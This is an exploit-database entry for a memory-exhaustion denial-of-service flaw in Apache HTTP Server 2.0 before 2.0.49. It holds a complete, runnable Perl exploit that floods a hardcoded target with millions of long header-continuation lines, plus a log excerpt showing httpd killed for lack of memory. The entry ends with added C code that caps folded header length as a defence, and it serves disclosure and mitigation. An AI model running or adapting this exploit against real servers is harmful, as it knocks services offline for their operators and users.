ap_get_mime_headers_core() vulnerability

Vendor: Apache HTTP Server
By: bkbll
CVSS: 7.5 (HIGH)
CWE: 400
Product Name: Apache HTTP Server
Affected Version From: Apache 2.0
Affected Version To: Apache 2.0.49
Patch Exists: YES
CPE: a:apache:http_server:2.0
Platforms Tested: Unknown

exploit for apache ap_get_mime_headers_core() vuln

This is an exploit for the Apache ap_get_mime_headers_core() vulnerability. The vulnerability allows an attacker to cause a denial of service (DoS) by sending a specially crafted HTTP request to the target server. The exploit sends a large number of GET requests with a long Content-Length header, causing the server to run out of memory and potentially crash. This exploit is specific to Apache version 2 prior to version 2.0.49.

Mitigation:

Upgrade to a patched version of Apache (version 2.0.49 or later).

Exploit-DB raw data:

#!/usr/bin/perl
#
#exploit for apache ap_get_mime_headers_core() vuln
#
#adv is here: http://www.guninski.com/httpd1.html
#
#version: apache 2 <2.0.49 apache 1 not tested.
#
#by bkbll bkbll#cnhonker.net http://www.cnhonker.com
#
#tail -f /var/log/messages
#Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd)
#

use IO::Socket::INET;

$host="10.10.10.114";
$port=80;
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') || die "new error$@\n";
binmode($sock);
$hostname="Host: $host";
$buf2='A'x50;
$buf4='A'x8183;
$len=length($buf2);
$buf="GET / HTTP/1.1\r\n";
send($sock,$buf,0) || die "send error:$@\n";
for($i= 0; $i < 2000000; $i++)
{
    $buf=" $buf4\r\n";
    send($sock,$buf,0) || die "send error:$@, target maybe have been D.o.S?\n";
}
$buf="$hostname\r\n";
$buf.="Content-Length: $len\r\n";

$buf.="\r\n";
$buf.=$buf2."\r\n\r\n";

send($sock,$buf,0) || die "send error:$@\n";
print "Ok, our buffer have send to target \n";
close($sock);
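
The script above keeps every physical line at 8183 bytes and starts each with a space, so the lines are header continuations and the bytes only add up once they are merged into one field. The C code below is an added example, not code from Apache or from the exploit's author: it caps the merged field instead of each line. `FIELD_LIMIT` (8190 is an illustrative value), `check_folded_headers` and `build_sample` are assumed names, and the sample request is constructed in memory.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_LIMIT 8190  /* assumed example cap on one logical field, folds included */
/* Walk a raw header block (everything after the request line). Returns 0 when every
 * logical field stays within `limit`, else the 1-based line that crossed it. */
long check_folded_headers(const char *buf, size_t len, size_t limit)
{
    size_t pos = 0, field = 0;   /* field: bytes held for the current logical field */
    long line_no = 0;

    while (pos < len) {
        const char *eol = memchr(buf + pos, '\n', len - pos);
        size_t n = eol ? (size_t)(eol - (buf + pos)) : len - pos;
        size_t next = eol ? pos + n + 1 : len;

        if (n > 0 && buf[pos + n - 1] == '\r') n--;   /* drop the CR of CRLF */
        if (n == 0) break;                            /* blank line ends the headers */
        line_no++;
        /* SP/HT at line start folds onto the previous field; on line 1 it starts one. */
        field = (line_no > 1 && (buf[pos] == ' ' || buf[pos] == '\t')) ? field + n : n;
        if (field > limit) return line_no;
        pos = next;
    }
    return 0;
}

/* Constructed sample: `folds` continuation lines of `fold_len` bytes, then a Host line. */
size_t build_sample(char *out, size_t cap, int folds, size_t fold_len)
{
    static const char tail[] = "Host: test.invalid\r\n\r\n";
    size_t used = 0;

    if (cap < sizeof tail) return 0;
    for (int i = 0; i < folds && used + fold_len + 3 + sizeof tail <= cap; i++) {
        memset(out + used, 'A', fold_len + 1);
        out[used] = ' ';                              /* leading space marks a fold */
        memcpy(out + used + 1 + fold_len, "\r\n", 2);
        used += fold_len + 3;
    }
    memcpy(out + used, tail, sizeof tail - 1);
    return used + sizeof tail - 1;
}

int main(void)
{
    static char req[64 * 1024];
    size_t len = build_sample(req, sizeof req, 3, 8183);
    printf("over limit at line %ld\n", check_folded_headers(req, len, FIELD_LIMIT));
    return 0;
}
```

A single 8183-byte line passes the cap; the second continuation line is where the merged field crosses it, which is the point at which a server or front-end filter can reject the request instead of continuing to buffer.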